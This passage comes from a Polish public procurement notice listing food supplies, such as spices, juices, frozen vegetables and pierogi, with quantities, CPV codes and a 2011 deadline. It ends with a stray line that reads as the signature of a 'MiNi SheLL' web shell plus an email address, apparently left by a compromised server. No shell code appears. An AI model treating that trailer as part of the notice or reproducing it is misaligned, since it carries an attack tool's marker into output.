31.		Barszcz biały, op. 1 kg	20 szt.
32.		Zupa żur, op. 900g	20 szt.
33.		Jarzynka, op. 2,80kg lub równoważny	30 szt.
34.		Vegeta, op.1kg lub równoważny	20 szt.
35.		Rosołek drobiowy 380g	10 szt.
36.		Bulion drobiowy, wiaderko op. do 2,20 kg	5 szt.
37.		Przyprawa do zup w płynie, op. 1000 g ( butelka szklana)	50 szt.
38.		Ziele angielskie, op. 15 g	50 szt.
39.		Liście laurowe, op. 6-7 g	60 szt.
40.		Pieprz mielony, op. 20 g	200 szt.
41.		Majeranek, op. 20 g	60 szt.
42.		Kminek mielony, op. 20 g	40 szt.
43.		Kminek,  op. 6-7 g	40 szt.
44.		Przyprawy do mięsa wieprzowego, dań z kapusty i fasoli, op.30g g różne 	200 szt.
45.		Cynamon 15 g	30 szt.
46.		Majonez, słoik 700 ml	70 szt.
47.		Ketchup 1l	30 szt.
48.		Cytrynka w płynie  1l	6 szt.
49.		Koncentrat buraczany w płynie, op. 300 g	20 szt.
50.		Koncentrat żurku tradycyjnego w płynie, op. 0,5 l	70 szt.
51.		Soki, op. 0,2 l, różne smaki	1000 szt.
52.		Syrop owocowy do herbaty, butelka o poj. ok. 0,45-0,5 l, różne smaki	200 szt.
53.		Batonik czekoladowy	500 szt.
54.		Pyzy ziemniaczane zwykłe, op. netto 450 g 	440 szt.
55.		Pyzy ziemniaczane z mięsem, op. netto 450 g	250 szt.
56.		Mieszanka kompotowa, op. 2,5 kg, zestaw z truskawką	100 szt.
57.		Wiśnie bez pestek, op. 2,5 kg	30 szt.
58.		Włoszczyzna, bukiet jarzyn op. 2,5 kg	50 szt.
59.		Mrożona mieszanka 7 warzyw	50 kg
60.		Truskawka mrożona, op. 2,5  kg	24 szt.
61.		Kalafior mrożony, op. 2,5 kg	16 szt.
62.		Kluski śląskie 450g 	250 szt.
63.		Marchew kostka mrożona,op.2,5kg	24 szt.
64.		Marchew z groszkiem mrożona,op.2,5kg	50 szt.
65.		Placki ziemniaczane 1,5 kg	100 szt.
66.		Brokuły 2,5 kg	50 szt.
67.		Fasola szparagowa zielona cięta 2,5 kg	50 szt.
68.		Fasola szparagowa biała (żółta) 2,5 kg	50 szt.
69.		Barszcz ukraiński mrożony	40 kg
70.		Chrzan tarty  z kwaskiem 860g	40 szt
71.		Koncentrat pomidorowy 30%, słoik waga ok.1 kg Kotlin, Pudliszki lub równoważny	60 szt.
72.		Koncentrat pomidorowy 30%, słoik waga ok. 245g  Kotlin, Pudliszki lub równoważny	50 szt.
73.		Dżemy, słoik waga 250 - 300 g	30 szt.
74.		Olej słonecznikowy z pierwszego tłoczenia, op. 5 l Kujawski, lub równoważny	60 szt.
75.		Olej słonecznikowy z pierwszego tłoczenia, op. 3 l  Kujawski, lub równoważny	20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa artykułów posiłki gotowe (garmażeryjne).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuł	Ilość
1.		Pierogi ruskie, wyrób garmażeryjny, cena 1 kg	500 kg
2.		Kluski kopytka, wyrób garmażeryjny, cena 1 kg	200 kg
3.		Naleśniki, wyrób garmażeryjny, cena 1 kg	70 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com